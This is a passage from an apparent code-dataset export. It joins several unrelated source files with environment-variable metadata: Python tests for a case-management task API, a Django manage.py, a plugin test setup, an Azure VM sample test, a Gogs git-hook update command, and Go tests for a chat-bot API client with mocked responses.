break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_case_id(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_case_severity(self, request):
"""Test Task Get by TQL"""
# create case
severity = 'Low'
case = self.cm_helper.create_case(severity=severity)
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.id(TQL.Operator.EQ, task.id)
tasks.filter.case_severity(TQL.Operator.EQ, severity)
tasks.filter.case_id(TQL.Operator.EQ, case.id)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
# unsure if there is a way to set completed by via UI
def test_task_get_by_tql_filter_completed_by(self, request):
"""Test Task Get by TQL"""
def test_task_get_by_tql_filter_completed_date(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'completed_date': datetime.now().isoformat(),
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.completed_date(
TQL.Operator.GT, (datetime.now() - timedelta(days=1)).strftime('%Y-%m-%d')
)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_config_playbook(self, request):
"""Test Task Get by TQL"""
def test_task_get_by_tql_filter_config_task(self, request):
"""Test Task Get by TQL"""
def test_task_get_by_tql_filter_description(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.description(TQL.Operator.EQ, task_data.get('description'))
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_due_date(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'due_date': (datetime.now() + timedelta(days=1)).isoformat(),
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.due_date(TQL.Operator.GT, datetime.now().strftime('%Y-%m-%d'))
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
# @mj - looking into a issue where artifact gets added to case and not task
# artifact
# def test_task_get_by_tql_filter_has_artifact(self, request):
# """Test Task Get by TQL"""
# # create case
# case = self.cm_helper.create_case()
# # task data
# task_data = {
# 'case_id': case.id,
# 'description': f'a description from {request.node.name}',
# 'name': f'name-{request.node.name}',
# 'xid': f'{request.node.name}-{time.time()}',
# }
# # create task
# task = self.cm.task(**task_data)
# # add artifacts
# artifact_data = {
# 'intel_type': 'indicator-ASN',
# 'summary': f'asn{randint(100, 999)}',
# 'type': 'ASN',
# }
# task.add_artifact(**artifact_data)
# # submit task
# task.submit()
# my_task = self.cm.task(id=task.id)
# my_task.get(all_available_fields=True)
# # get artifact id
# for artifact in task.artifacts:
# artifact_id = artifact.id
# # retrieve tasks using TQL
# tasks = self.cm.tasks()
# tasks.filter.id(TQL.Operator.EQ, task.id)
# tasks.filter.has_artifact.id(TQL.Operator.EQ, artifact_id)
# for task in tasks:
# assert task.description == task_data.get('description')
# assert task.name == task_data.get('name')
# break
# else:
# assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_has_case(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.id(TQL.Operator.EQ, task.id)
tasks.filter.has_case.id(TQL.Operator.EQ, case.id)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_has_note(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.add_note(text='blah')
task.submit()
# get note id
for note in task.notes:
note_id = note.id
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.id(TQL.Operator.EQ, task.id)
tasks.filter.has_note.id(TQL.Operator.EQ, note_id)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_id(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.id(TQL.Operator.EQ, task.id)
tasks.filter.description(TQL.Operator.EQ, task_data.get('description'))
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_name(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.name(TQL.Operator.EQ, task_data.get('name'))
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_required(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.required(TQL.Operator.EQ, False)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_status(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'status': 'Open',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.status(TQL.Operator.EQ, task_data.get('status'))
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_target_id(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
assignee = self.cm.assignee(type='User', user_name=os.getenv('API_ACCESS_ID'))
task_data = {
'assignee': assignee,
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'status': 'Open',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.target_id(TQL.Operator.EQ, 5)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_target_type(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
assignee = self.cm.assignee(type='User', user_name=os.getenv('API_ACCESS_ID'))
task_data = {
'assignee': assignee,
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'status': 'Open',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.target_type(TQL.Operator.EQ, 'User')
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_workflow_phase(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'status': 'Open',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.workflow_phase(TQL.Operator.EQ, 0)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_workflow_step(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'status': 'Open',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.workflow_step(TQL.Operator.EQ, 1)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
break
else:
assert False, 'No task returned for TQL'
def test_task_get_by_tql_filter_xid(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.xid(TQL.Operator.EQ, task_data.get('xid'))
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
|
[] |
[] |
[
"TEARDOWN_METHOD",
"API_ACCESS_ID"
] |
[]
|
["TEARDOWN_METHOD", "API_ACCESS_ID"]
|
python
| 2 | 0 | |
manage.py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'django_food_rating_app.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
Trakttv.bundle/Contents/Tests/tests/__init__.py
|
import logging
logging.basicConfig(level=logging.DEBUG)
import os
import sys
import tempfile
#
# Directories / Paths
#
CURRENT_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..')
# Build plugin paths
CODE_DIR = os.path.abspath(os.path.join(CURRENT_DIR, '..', 'Code'))
LIBRARIES_DIR = os.path.abspath(os.path.join(CURRENT_DIR, '..', 'Libraries'))
PLUGIN_DIR = os.path.abspath(os.path.join(LIBRARIES_DIR, 'Shared', 'plugin'))
# Create temporary directory
TEMP_DIR = tempfile.mkdtemp()
# Update `sys.path`
sys.path.insert(0, os.path.join(LIBRARIES_DIR, 'Shared'))
sys.path.insert(0, CODE_DIR)
#
# Environment
#
from plex_mock.framework import Core
from plugin.core.environment import Environment
from plugin.core.constants import PLUGIN_IDENTIFIER
# Setup environment
Environment.setup(Core(CODE_DIR), {
'trakt.token': 'trakt.token'
}, None, {
'username': 'username',
'password': 'password'
})
# Build directory structure for "Plug-in Support"
PLUGIN_SUPPORT = os.path.join(TEMP_DIR, 'Plug-in Support')
os.makedirs(os.path.join(PLUGIN_SUPPORT, 'Caches', PLUGIN_IDENTIFIER))
os.makedirs(os.path.join(PLUGIN_SUPPORT, 'Data', PLUGIN_IDENTIFIER))
os.makedirs(os.path.join(PLUGIN_SUPPORT, 'Databases'))
Environment.path.plugin_support = PLUGIN_SUPPORT
# Setup native libraries
from plugin.core.libraries.manager import LibrariesManager
LibrariesManager.setup(cache=False)
LibrariesManager.test()
# Setup database proxy
from plugin.core.database.manager import DatabaseManager
from tests.helpers.database import DATABASE_PROXY
db_path = os.path.abspath(Environment.path.plugin_database)
DatabaseManager._cache['peewee'][db_path] = DATABASE_PROXY
# Configure plex.database.py
os.environ['LIBRARY_DB'] = os.path.join(
Environment.path.plugin_support, 'Databases',
'com.plexapp.plugins.library.db'
)
#
# Preferences
#
from plugin.preferences.main import Preferences
@classmethod
def preferences_get(cls, key, account=None):
return None
# Patch `Preferences.get` method
Preferences.get = preferences_get
#
# Modules
#
from plugin.core.importer import import_modules
from plugin.modules.core.manager import ModuleManager
# ModuleManager
ModuleManager.initialize()
ModuleManager.start([
'matcher'
])
# Scrobbler
import_modules(os.path.join(PLUGIN_DIR, 'scrobbler', 'handlers'), exclude=[
'__init__.py'
])
|
[] |
[] |
[
"LIBRARY_DB"
] |
[]
|
["LIBRARY_DB"]
|
python
| 1 | 0 | |
compute/compute_test.go
|
// Copyright (c) Microsoft and contributors. All rights reserved.
//
// This source code is licensed under the MIT license found in the
// LICENSE file in the root directory of this source tree.
package compute
import (
"context"
"flag"
"fmt"
"log"
"os"
"testing"
"github.com/Azure-Samples/azure-sdk-for-go-samples/helpers"
"github.com/Azure-Samples/azure-sdk-for-go-samples/network"
"github.com/Azure-Samples/azure-sdk-for-go-samples/resources"
"github.com/subosito/gotenv"
)
var (
vmName = "az-samples-go-" + helpers.GetRandomLetterSequence(10)
nicName = "nic1"
username = "az-samples-go-user"
password = "NoSoupForYou1!"
sshPublicKeyPath = os.Getenv("HOME") + "/.ssh/id_rsa.pub"
virtualNetworkName = "vnet1"
subnet1Name = "subnet1"
subnet2Name = "subnet2"
nsgName = "nsg1"
ipName = "ip1"
)
func TestMain(m *testing.M) {
err := parseArgs()
if err != nil {
log.Fatalln("failed to parse args")
}
ctx := context.Background()
defer resources.Cleanup(ctx)
_, err = resources.CreateGroup(ctx, helpers.ResourceGroupName())
if err != nil {
helpers.PrintAndLog(err.Error())
}
helpers.PrintAndLog(fmt.Sprintf("resource group created on location: %s", helpers.Location()))
os.Exit(m.Run())
}
func parseArgs() error {
gotenv.Load()
virtualNetworkName = os.Getenv("AZ_VNET_NAME")
flag.StringVar(&virtualNetworkName, "vnetName", virtualNetworkName, "Specify a name for the vnet.")
err := helpers.ParseArgs()
if err != nil {
return fmt.Errorf("cannot parse args: %v", err)
}
if !(len(virtualNetworkName) > 0) {
virtualNetworkName = "vnet1"
}
return nil
}
func ExampleCreateVM() {
ctx := context.Background()
_, err := network.CreateVirtualNetworkAndSubnets(ctx, virtualNetworkName, subnet1Name, subnet2Name)
if err != nil {
helpers.PrintAndLog(err.Error())
}
helpers.PrintAndLog("created vnet and 2 subnets")
_, err = network.CreateNetworkSecurityGroup(ctx, nsgName)
if err != nil {
helpers.PrintAndLog(err.Error())
}
helpers.PrintAndLog("created network security group")
_, err = network.CreatePublicIP(ctx, ipName)
if err != nil {
helpers.PrintAndLog(err.Error())
}
helpers.PrintAndLog("created public IP")
_, err = network.CreateNIC(ctx, virtualNetworkName, subnet1Name, nsgName, ipName, nicName)
if err != nil {
helpers.PrintAndLog(err.Error())
}
helpers.PrintAndLog("created nic")
_, err = CreateVM(ctx, vmName, nicName, username, password, sshPublicKeyPath)
if err != nil {
helpers.PrintAndLog(err.Error())
}
helpers.PrintAndLog("created VM")
// Output:
// created vnet and 2 subnets
// created network security group
// created public IP
// created nic
// created VM
}
|
[
"\"HOME\"",
"\"AZ_VNET_NAME\""
] |
[] |
[
"HOME",
"AZ_VNET_NAME"
] |
[]
|
["HOME", "AZ_VNET_NAME"]
|
go
| 2 | 0 | |
cmd/update.go
|
// Copyright 2014 The Gogs Authors. All rights reserved.
// Use of this source code is governed by a MIT-style
// license that can be found in the LICENSE file.
package cmd
import (
"os"
"github.com/codegangsta/cli"
"github.com/gogits/gogs/models"
"github.com/gogits/gogs/modules/log"
"github.com/gogits/gogs/modules/setting"
)
var CmdUpdate = cli.Command{
Name: "update",
Usage: "This command should only be called by Git hook",
Description: `Update get pushed info and insert into database`,
Action: runUpdate,
Flags: []cli.Flag{
stringFlag("config, c", "custom/conf/app.ini", "Custom configuration file path"),
},
}
func runUpdate(c *cli.Context) {
if c.IsSet("config") {
setting.CustomConf = c.String("config")
}
setup("update.log")
if len(os.Getenv("SSH_ORIGINAL_COMMAND")) == 0 {
log.GitLogger.Trace("SSH_ORIGINAL_COMMAND is empty")
return
}
args := c.Args()
if len(args) != 3 {
log.GitLogger.Fatal(2, "Arguments received are not equal to three")
} else if len(args[0]) == 0 {
log.GitLogger.Fatal(2, "First argument 'refName' is empty, shouldn't use")
}
task := models.UpdateTask{
UUID: os.Getenv("uuid"),
RefName: args[0],
OldCommitID: args[1],
NewCommitID: args[2],
}
if err := models.AddUpdateTask(&task); err != nil {
log.GitLogger.Fatal(2, "AddUpdateTask: %v", err)
}
}
|
[
"\"SSH_ORIGINAL_COMMAND\"",
"\"uuid\""
] |
[] |
[
"uuid",
"SSH_ORIGINAL_COMMAND"
] |
[]
|
["uuid", "SSH_ORIGINAL_COMMAND"]
|
go
| 2 | 0 | |
v1/client_test.go
|
package v1
import (
"bytes"
"encoding/json"
"fmt"
"log"
"math/rand"
"net/http"
"os"
"strconv"
"strings"
"testing"
"time"
"github.com/joho/godotenv"
"github.com/stretchr/testify/assert"
"gopkg.in/h2non/gock.v1"
)
const (
letterBytes = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
letterIdxBits = 6 // 6 bits to represent a letter index
letterIdxMask = 1<<letterIdxBits - 1 // All 1-bits, as many as letterIdxBits
letterIdxMax = 63 / letterIdxBits // # of letter indices fitting in 63 bits
)
var src = rand.NewSource(time.Now().UnixNano())
func TestMain(m *testing.M) {
if os.Getenv("DEVELOPER_NODE") == "1" {
err := godotenv.Load("../.env")
if err != nil {
log.Fatal("Error loading .env file")
}
}
os.Exit(m.Run())
}
var (
mgURL = "https://api.example.com"
mgToken = "test_token"
debug, _ = strconv.ParseBool(os.Getenv("DEBUG"))
)
func client() *MgClient {
c := New(mgURL, mgToken)
if debug != false {
c.Debug = true
}
return c
}
func TestMgClient_Bots(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Get("/api/bot/v1/bots").
Reply(200).
BodyString(`[{"id": 1, "name": "Test Bot", "created_at": "2018-01-01T00:00:00.000000Z", "is_active": true, "is_self": true}]`)
req := BotsRequest{Active: 1}
data, status, err := c.Bots(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, data)
for _, bot := range data {
assert.NotEmpty(t, bot.CreatedAt)
}
}
func TestMgClient_Channels(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Get("/api/bot/v1/channels").
Reply(200).
BodyString(`[
{
"id": 1,
"type": "custom",
"name": "Test custom channel",
"settings": {
"customer_external_id": "phone",
"sending_policy": {
"new_customer": "no",
"after_reply_timeout": "template"
},
"status": {
"delivered": "both",
"read": "receive"
},
"text": {
"creating": "both",
"editing": "receive",
"quoting": "send",
"deleting": "receive",
"max_chars_count": 777
},
"product": {
"creating": "receive",
"editing": "receive",
"deleting": "receive"
},
"order": {
"creating": "receive",
"editing": "receive",
"deleting": "receive"
},
"image": {
"creating": "both",
"quoting": "receive",
"editing": "none",
"deleting": "receive",
"max_items_count": 1,
"note_max_chars_count": 777
},
"file": {
"creating": "both",
"quoting": "receive",
"editing": "none",
"deleting": "receive",
"max_items_count": 1,
"note_max_chars_count": 777
},
"suggestions": {
"text": "receive",
"email": "receive",
"phone": "receive"
}
},
"created_at": "2018-01-01T00:00:00.000000Z",
"updated_at": null,
"activated_at": "2018-01-01T00:00:00.000000Z",
"deactivated_at": null,
"is_active": true
}
]`)
channels, status, err := c.Channels(ChannelsRequest{Active: 1})
assert.NoError(t, err)
assert.Equal(t, 200, status)
assert.Len(t, channels, 1)
ch := channels[0]
assert.Equal(t, uint64(1), ch.ID)
assert.Equal(t, ChannelTypeCustom, ch.Type)
assert.Equal(t, "Test custom channel", ch.Name)
assert.Equal(t, "2018-01-01T00:00:00.000000Z", ch.CreatedAt)
assert.Empty(t, ch.UpdatedAt)
assert.Equal(t, "2018-01-01T00:00:00.000000Z", ch.ActivatedAt)
assert.Empty(t, ch.DeactivatedAt)
assert.True(t, ch.IsActive)
chs := ch.Settings
assert.Equal(t, "phone", chs.CustomerExternalID)
assert.Equal(t, "no", chs.SendingPolicy.NewCustomer)
assert.Equal(t, "template", chs.SendingPolicy.AfterReplyTimeout)
assert.Equal(t, ChannelFeatureBoth, chs.Status.Delivered)
assert.Equal(t, ChannelFeatureReceive, chs.Status.Read)
assert.Equal(t, ChannelFeatureBoth, chs.Text.Creating)
assert.Equal(t, ChannelFeatureReceive, chs.Text.Editing)
assert.Equal(t, ChannelFeatureSend, chs.Text.Quoting)
assert.Equal(t, ChannelFeatureReceive, chs.Text.Deleting)
assert.Equal(t, uint16(777), chs.Text.MaxCharsCount)
assert.Equal(t, ChannelFeatureReceive, chs.Product.Creating)
assert.Equal(t, ChannelFeatureReceive, chs.Product.Editing)
assert.Equal(t, ChannelFeatureReceive, chs.Product.Deleting)
assert.Equal(t, ChannelFeatureReceive, chs.Order.Creating)
assert.Equal(t, ChannelFeatureReceive, chs.Order.Editing)
assert.Equal(t, ChannelFeatureReceive, chs.Order.Deleting)
assert.Equal(t, ChannelFeatureBoth, chs.Image.Creating)
assert.Equal(t, ChannelFeatureNone, chs.Image.Editing)
assert.Equal(t, ChannelFeatureReceive, chs.Image.Quoting)
assert.Equal(t, ChannelFeatureReceive, chs.Image.Deleting)
assert.Equal(t, 1, chs.Image.MaxItemsCount)
assert.Equal(t, uint16(777), chs.Image.NoteMaxCharsCount)
assert.Equal(t, ChannelFeatureBoth, chs.File.Creating)
assert.Equal(t, ChannelFeatureNone, chs.File.Editing)
assert.Equal(t, ChannelFeatureReceive, chs.File.Quoting)
assert.Equal(t, ChannelFeatureReceive, chs.File.Deleting)
assert.Equal(t, 1, chs.File.MaxItemsCount)
assert.Equal(t, uint16(777), chs.File.NoteMaxCharsCount)
assert.Equal(t, ChannelFeatureReceive, chs.Suggestions.Text)
assert.Equal(t, ChannelFeatureReceive, chs.Suggestions.Email)
assert.Equal(t, ChannelFeatureReceive, chs.Suggestions.Phone)
}
func TestMgClient_Users(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Get("/api/bot/v1/users").
Reply(200).
BodyString(`[{"id": 1, "external_id":"1", "username": "Test", "first_name":"Test", "last_name":"Test", "created_at": "2018-01-01T00:00:00.000000Z", "is_active": true, "is_online": true}]`)
req := UsersRequest{Active: 1}
data, status, err := c.Users(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, data)
for _, user := range data {
assert.NotEmpty(t, user.FirstName)
}
}
func TestMgClient_Customers(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Get("/api/bot/v1/customers").
Reply(200).
BodyString(`[{"id": 1,"channel_id": 1, "created_at": "2018-01-01T00:00:00.000000Z"}]`)
req := CustomersRequest{}
data, status, err := c.Customers(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, data)
for _, customer := range data {
assert.NotEmpty(t, customer.ChannelId)
}
}
func TestMgClient_Chats(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Get("/api/bot/v1/chats").
Reply(200).
BodyString(`[{"id": 1,"customer": {"id": 1, "name": "Test"}, "created_at": "2018-01-01T00:00:00.000000Z"}]`)
req := ChatsRequest{ChannelType: ChannelTypeTelegram}
data, status, err := c.Chats(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, data)
for _, chat := range data {
assert.NotEmpty(t, chat.Customer.Name)
}
}
func TestMgClient_Members(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Get("/api/bot/v1/members").
Reply(200).
BodyString(`[{"id": 1,"user_id": 1, "chat_id": 1, "created_at": "2018-01-01T00:00:00.000000Z"}]`)
req := MembersRequest{State: ChatMemberStateLeaved}
data, status, err := c.Members(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
for _, member := range data {
assert.NotEmpty(t, member.ChatID)
}
}
func TestMgClient_Dialogs(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Get("/api/bot/v1/dialogs").
Reply(200).
BodyString(`[{"id": 1, "chat_id": 1, "created_at": "2018-01-01T00:00:00.000000Z"}]`)
req := DialogsRequest{Active: 0}
data, status, err := c.Dialogs(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, data)
for _, dialog := range data {
assert.NotEmpty(t, dialog.ChatID)
}
}
func TestMgClient_DialogAssign(t *testing.T) {
c := client()
d := 1
u := 1
req := DialogAssignRequest{DialogID: uint64(d), UserID: uint64(u)}
r, _ := json.Marshal(req)
defer gock.Off()
gock.New(mgURL).
Patch("/api/bot/v1/dialogs/1/assign").
JSON(r).
Reply(400).
BodyString(`{"errors": ["dialog is not the latest in the chat"]}`)
_, status, err := c.DialogAssign(req)
assert.Error(t, err)
assert.Equal(t, http.StatusBadRequest, status)
}
func TestMgClient_DialogUnassign(t *testing.T) {
c := client()
defer gock.Off()
t.Run("success", func(t *testing.T) {
gock.New(mgURL).
Patch("/api/bot/v1/dialogs/777/unassign").
Reply(200).
BodyString(`{"previous_responsible": {"id": 111, "type": "bot", "assigned_at": "2020-07-14T14:11:44.000000Z"}}`)
resp, status, err := c.DialogUnassign(777)
assert.NoError(t, err)
assert.Equal(t, http.StatusOK, status)
assert.Equal(t, int64(111), resp.PreviousResponsible.ID)
assert.Equal(t, "bot", resp.PreviousResponsible.Type)
assert.Equal(t, "2020-07-14T14:11:44.000000Z", resp.PreviousResponsible.AssignAt)
})
t.Run("dialog not latest in chat", func(t *testing.T) {
gock.New(mgURL).
Patch("/api/bot/v1/dialogs/666/unassign").
Reply(400).
BodyString(`{"errors": ["dialog is not the latest in the chat"]}`)
_, status, err := c.DialogUnassign(666)
assert.Error(t, err, "dialog is not the latest in the chat")
assert.Equal(t, http.StatusBadRequest, status)
})
t.Run("dialog is not assigned", func(t *testing.T) {
gock.New(mgURL).
Patch("/api/bot/v1/dialogs/555/unassign").
Reply(400).
BodyString(`{"errors": ["dialog is not assigned"]}`)
_, status, err := c.DialogUnassign(555)
assert.Error(t, err)
assert.Equal(t, http.StatusBadRequest, status)
})
t.Run("dialog not found", func(t *testing.T) {
gock.New(mgURL).
Patch("/api/bot/v1/dialogs/444/unassign").
Reply(404).
BodyString(`{"errors": ["dialog #444 not found"]}`)
_, status, err := c.DialogUnassign(444)
assert.Error(t, err)
assert.Equal(t, http.StatusNotFound, status)
})
}
func TestMgClient_DialogClose(t *testing.T) {
c := client()
i := 1
defer gock.Off()
gock.New(mgURL).
Delete("/api/bot/v1/dialogs/1/close").
Reply(400).
BodyString(`{"errors": ["dialog #1 not found"]}`)
_, status, err := c.DialogClose(uint64(i))
assert.Error(t, err)
assert.Equal(t, http.StatusBadRequest, status)
}
func TestMgClient_Messages(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Get("/api/bot/v1/messages").
Reply(200).
BodyString(`[{"id": 1, "time": "2018-01-01T00:00:00+03:00", "type": "text", "scope": "public", "chat_id": 1, "is_read": false, "is_edit": false, "status": "received", "created_at": "2018-01-01T00:00:00.000000Z"}]`)
req := MessagesRequest{ChannelType: ChannelTypeTelegram, Scope: MessageScopePublic}
data, status, err := c.Messages(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, data)
for _, message := range data {
assert.NotEmpty(t, message.ID)
}
}
func TestMgClient_MessageSendText(t *testing.T) {
c := client()
i := uint64(1)
message := MessageSendRequest{
Type: MsgTypeText,
Scope: "public",
Content: "test",
ChatID: i,
}
defer gock.Off()
gock.New(mgURL).
